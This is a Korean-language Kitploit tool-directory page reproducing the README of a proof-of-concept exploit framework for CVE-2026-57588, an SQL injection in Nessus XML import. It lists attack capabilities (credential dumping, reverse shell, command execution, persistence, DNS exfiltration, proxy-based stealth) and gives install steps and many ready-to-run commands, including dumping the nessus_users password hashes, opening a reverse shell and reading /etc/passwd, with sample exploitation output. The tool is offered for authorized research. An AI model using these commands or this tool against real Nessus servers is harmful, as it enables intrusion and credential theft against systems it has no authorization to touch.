Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC — CVE-2026-57588용 PoC - Nessus 10.12.0 XML 가져오기의 SQL 주입. 데이터베이스 열거, 자격 증명 유출, 시간 기반 블라인드 주입 테스트를 위한 악성 .nessus 파일을 생성합니다. 승인된 보안 연구용입니다. 작성자: Sudeepa Wanigarathna. 10.12.1에서 패치됨. | Kitploit
도구/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPost-ExploitationPenetration TestingCommand and ControlRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Database Security
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

CVE-2026-57588용 PoC - Nessus 10.12.0 XML 가져오기의 SQL 주입. 데이터베이스 열거, 자격 증명 유출, 시간 기반 블라인드 주입 테스트를 위한 악성 .nessus 파일을 생성합니다. 승인된 보안 연구용입니다. 작성자: Sudeepa Wanigarathna. 10.12.1에서 패치됨.

저장소 보기
1172개월 전아직 검토되지 않음

🛡️ CVE-2026-57588 - Nessus SQL 인젝션 익스플로잇 프레임워크

Security Research CVE Version Python License


📋 목차

  • 개요
  • 취약점 세부 정보
  • 기능
  • 설치
  • 빠른 시작
  • 사용 예제
  • 페이로드 유형
  • 고급 시나리오
  • 리포트
  • 문제 해결
  • 보안 고려사항
  • 라이선스

🔍 개요

CVE-2026-57588은 Tenable Nessus 버전 10.12.0 이하에서 발견된 치명적인 SQL 인젝션 취약점입니다. 이 취약점은 .nessus 스캔 결과 파일을 가져올 때 XML 파싱 메커니즘에 존재하며, 가져오기 권한이 있는 인증된 사용자가 백엔드 PostgreSQL 데이터베이스에 대해 임의의 SQL 쿼리를 실행할 수 있도록 합니다.


⚠️ 취약점 세부 정보

속성값
CVE IDCVE-2026-57588
취약점 유형SQL 인젝션
영향받는 제품Tenable Nessus 10.12.0 이하
수정된 버전Nessus 10.12.1 이상
CVSS 점수4.3 (중간)
공격 벡터네트워크
공격 복잡도낮음
필요 권한인증됨 (가져오기 권한)
사용자 상호작용필요 (사회 공학)
영향데이터 유출, RCE

🔬 기술적 세부 사항

이 취약점은 가져오기 프로세스 중 XML 태그 값이 SQL 쿼리에 포함되기 전에 충분히 정화되지 않아 발생합니다. 악의적인 공격자는 다음과 같은 XML 태그에 특수 제작된 SQL 인젝션 페이로드가 포함된 .nessus 파일을 조작할 수 있습니다:

  • hostname
  • fqdn
  • os
  • system-type
  • mac-address
  • netbios-name

권한이 있는 사용자가 악성 파일을 가져오면 정화되지 않은 값이 PostgreSQL 백엔드에서 실행되어 다음이 가능해집니다:

  • 데이터베이스 열거
  • 데이터 유출
  • 명령 실행
  • 파일 시스템 접근
  • 지속성 설치

✨ 기능

기능 목록 보기

🎯 페이로드 관리

  • 13개 이상의 페이로드 유형을 목적별로 분류
  • 템플릿 기반 페이로드 생성
  • 사용자 정의 페이로드 생성 및 검증
  • 매개변수 검증 및 구문 검사
  • SQL 구문 확인

🚀 익스플로잇 기능

  • 다단계 익스플로잇 및 병렬 실행
  • 데이터베이스 핑거프린팅 및 열거
  • 사용자 정의 테이블/열 선택을 통한 데이터 유출
  • 대상 시스템에서 명령 실행
  • 파일 시스템 접근 및 읽기
  • 대화형 세션을 통한 리버스 셸
  • 지속성 설치 메커니즘
  • 시간 기반 블라인드 SQL 인젝션
  • 부울 기반 블라인드 SQL 인젝션
  • 오류 기반 SQL 인젝션
  • 고급 익스플로잇을 위한 스택 쿼리
  • 대역 외 DNS 유출

📊 리포팅 및 로깅

  • 전문적인 스타일의 HTML 리포트
  • 문서화를 위한 Markdown 리포트
  • 자동화를 위한 JSON 리포트
  • 빠른 검토를 위한 텍스트 리포트
  • 여러 레벨의 로그 로테이션
  • 상세한 실행 통계
  • 무결성 검증을 위한 파일 해싱

🛠️ 고급 기능

  • 설정 가능한 작업 수의 병렬 실행
  • 은밀한 작업을 위한 프록시 지원
  • SSL/TLS 인증서 처리
  • XML 검증 및 스키마 확인
  • 실시간 익스플로잇을 위한 대화형 모드
  • 안정성을 위한 재시도 메커니즘
  • 느린 연결을 위한 타임아웃 설정

📦 전문 도구

  • 하위 명령 기반 CLI 구조
  • 자세한 출력 및 조용한 모드
  • 색상화된 터미널 출력
  • 긴 작업을 위한 진행 표시기
  • 컨테이너화된 테스트를 위한 Docker 지원
  • 크로스 플랫폼 호환성 (Linux, Windows, macOS)

📦 설치

🐍 사전 요구 사항

  • Python 3.7 이상
  • pip (Python 패키지 관리자)
  • Git (선택 사항, 클론용)

🔧 빠른 설치

# 저장소 클론
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# 가상 환경 생성 및 활성화
python3 -m venv venv
source venv/bin/activate  # Windows: venv\Scripts\activate

# 의존성 설치
pip install -r requirements.txt

# 설치 확인
python3 exploit.py --version

🐳 Docker 설치

# Docker 이미지 빌드
docker build -t nessus-exploit .

# 도구 실행
docker run -it --rm nessus-exploit generate -u https://test.com -p enum

📦 패키지 설치

# 패키지로 설치
pip install -e .

# 이제 어디서든 실행 가능
nessus-exploit generate -u https://test.com -p enum

🚀 빠른 시작

기본 사용법

# 기본 열거 익스플로잇 생성
python3 exploit.py generate -u https://test.com -p enum

# 고급 다단계 익스플로잇 생성
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus

# 데이터베이스에서 데이터 추출
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

명령 도움말

# 일반 도움말 표시
python3 exploit.py --help

# generate 명령 도움말 표시
python3 exploit.py generate --help

# 사용 가능한 모든 페이로드 나열
python3 exploit.py list

💡 사용 예제

1. 기본 열거

python3 exploit.py generate -u https://test.com -p enum
예상 출력
[2026-07-22 10:15:23] [INFO] [*] Starting exploitation against https://test.com
[2026-07-22 10:15:23] [INFO] [*] Session: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] Payload: enum
[2026-07-22 10:15:23] [INFO] [*] Executing stage: fingerprint
[2026-07-22 10:15:24] [INFO] [+] Generated XML: exploit_20260722_fingerprint_101523.nessus (3847 bytes)
[2026-07-22 10:15:24] [INFO] [*] Executing stage: schema_dump
[2026-07-22 10:15:25] [INFO] [+] Generated XML: exploit_20260722_schema_dump_101524.nessus (4213 bytes)
[2026-07-22 10:15:25] [INFO] [+] Exploitation complete! Duration: 2.15s

============================================================
EXPLOITATION SUMMARY
============================================================
Target: https://test.com
Status: SUCCESS
Duration: 2.15s
Files Generated: 3
Reports Generated: 3
============================================================

2. 고급 다단계 익스플로잇

python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v

3. 데이터 유출

# 사용자 자격 증명 추출
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# 사용자 정의 열로 추출
python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status

4. 리버스 셸

# 리스너 시작 및 익스플로잇 생성
python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus

5. 명령 실행

# 기본 명령 실행
python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"

# 복잡한 명령 실행
python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"

6. 파일 읽기

# 시스템 파일 읽기
python3 exploit.py generate -u https://test.com -p file -f /etc/passwd

# 애플리케이션 로그 읽기
python3 exploit.py generate -u https://test.com -p file -f /var/log/nessus/nessusd.log

7. 시간 기반 블라인드 인젝션

# 5초 지연
python3 exploit.py generate -u https://test.com -p sleep -s 5

# 무거운 테스트를 위한 30초 지연
python3 exploit.py generate -u https://test.com -p sleep -s 30

8. 프록시 지원

# HTTP 프록시
python3 exploit.py generate -u https://test.com -p advanced --proxy http://127.0.0.1:8080

# 인증이 있는 HTTPS 프록시
python3 exploit.py generate -u https://test.com -p advanced --proxy https://user:[email protected]:8080

9. 병렬 실행

# 8개의 병렬 작업으로 실행
python3 exploit.py generate -u https://test.com -p advanced --jobs 8

# 사용자 정의 타임아웃 및 재시도
python3 exploit.py generate -u https://test.com -p advanced --jobs 4 --timeout 60 --retries 5

10. 자세한 출력 및 조용한 모드

# 자세한 모드 (상세 출력)
python3 exploit.py generate -u https://test.com -p advanced -v --log-file debug.log

# 조용한 모드 (최소 출력)
python3 exploit.py generate -u https://test.com -p advanced -q

📚 페이로드 유형

카테고리: FINGERPRINTING

페이로드설명매개변수
fingerprint데이터베이스 핑거프린팅없음

카테고리: UNION

페이로드설명매개변수
schema_dump데이터베이스 스키마 덤프없음
data_exfil테이블 데이터 추출table, columns

카테고리: TIMING

페이로드설명매개변수
time_based시간 기반 블라인드 인젝션delay
boolean_blind부울 기반 블라인드condition, delay

카테고리: FILE_ACCESS

페이로드설명매개변수
file_read시스템 파일 읽기path, offset, length
도구 다운로드